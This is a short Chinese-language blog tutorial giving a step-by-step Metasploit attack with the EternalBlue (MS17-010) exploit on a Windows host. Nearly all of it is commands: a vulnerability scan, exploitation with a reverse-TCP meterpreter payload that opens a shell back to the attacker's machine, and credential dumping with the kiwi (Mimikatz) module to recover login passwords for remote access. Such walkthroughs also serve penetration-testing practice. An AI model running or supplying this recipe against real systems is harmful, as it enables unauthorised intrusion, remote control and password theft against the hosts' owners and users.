MSF永恒之蓝使用

MSF永恒之蓝MS17-010

1. 扫描漏洞

use auxiliary/scanner/smb/smb_ms17_010（加载模块扫描exp）
set RHOSTS 192.168.167.60（设置被扫描ip）
run（开始扫描，查看是否存在漏洞）

检测到可以使用永恒之蓝

2. 漏洞攻击

use exploit/windows/smb/ms17_010_eternalblue（加载攻击模块）
set RHOSTS 192.168.167.60（被攻击IP）
set LHOST 192.168.167.48 （设置本机IP）
set LPORT 4444 （设置连接端口）
set payload windows/x64/meterpreter/reverse_tcp （设置payload） run （开始攻击）

显示攻击IP＋端口＞＞＞目标IP＋端口（反弹成功）

shell（拿到权限）

3. 获取登录用户名密码

meterpreter > load kiwi
meterpreter > creds_msv
meterpreter > creds_wdigest

拿到登录密码

4. 下面就可以远程登录目标主机了

---

如文章有错误感谢指出，联系Q：2181796086

如文章有帮助点赞关注一下吧！

学习交流群（Q）：947264925